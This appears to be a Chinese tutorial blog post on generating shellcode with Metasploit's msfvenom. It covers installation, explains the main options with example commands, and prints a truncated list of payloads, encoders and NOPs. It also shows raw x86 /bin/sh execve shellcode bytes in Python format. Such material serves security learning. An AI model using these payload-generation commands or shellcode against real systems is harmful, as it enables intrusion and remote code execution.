metasploit-shellcode生成
0x00 安装metasploit
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall $ chmod 755 msfinstall $ ./msfinstall
0x01 参数介绍
Options: -p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads --payload-options List the payload's standard options -l, --list [type] List a module type. Options are: payloads, encoders, nops, all -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload -f, --format <format> Output format (use --help-formats for a list) --help-formats List available formats -e, --encoder <encoder> The encoder to use -a, --arch <arch> The architecture to use --platform <platform> The platform of the payload --help-platforms List available platforms -s, --space <length> The maximum size of the resulting payload --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -b, --bad-chars <list> The list of characters to avoid example: '\x00\xff' -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread -o, --out <path> Save the payload -v, --var-name <name> Specify a custom variable name to use for certain output formats --smallest Generate the smallest possible payload -h, --help Show this message
1. -p 指定payload的功能
--payload:确定payload类型
--payload-options:查看对应payload类型子选项
例:
msfvenom -p linux/x86/exec CMD=/bin/sh 执行shell
2. -a 指定处理器架构和操作平台
--arch:指定处理器架构
--platform:指定平台
例:
msfvenom -a x86 --platform linux
3. -f 指定输出格式
例:
msfvenom -a x86 --platform linux -f python payload以python语言格式输出
4. -b 指定规避字符串(以字符的16进制表示)
例:
msfvenom -a x86 --platform linux -b "\x00\x0a" 生成的payload中不允许出现'\x00'和'\x0a'
5. -e 指定编码器
例:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -e x86/alpha_mixed
6. -n 在payload前填充Nop Sled
--nopsled:指定rop类型 <length>:指定rop长度
例:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -n x86/single_byte 120
7. -l 列出msf中payload类型,编码器类型,NOP类型
msfvenom -l
Framework Payloads (486 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager
......
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
......
Framework NOPs (9 total)
========================
Name Description
---- -----------
armle/simple Simple NOP generator
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator
8. -v 指定payload名字
payload默认叫buf
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -f python
No encoder or badchars specified, outputting raw payload
Payload size: 38 bytes
Final size of python file: 192 bytes
buf = ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03"
buf += "\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"
例:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -v payload -f python
No encoder or badchars specified, outputting raw payload
Payload size: 38 bytes
Final size of python file: 222 bytes
payload = ""
payload += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68"
payload += "\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52"
payload += "\xe8\x03\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1"
payload += "\xcd\x80"
9. 其他参数我没有深究
0x02 参考
生成自己的Alphanumeric/Printable shellcode
工具总归是工具,自己还是要会写,fighting!! 。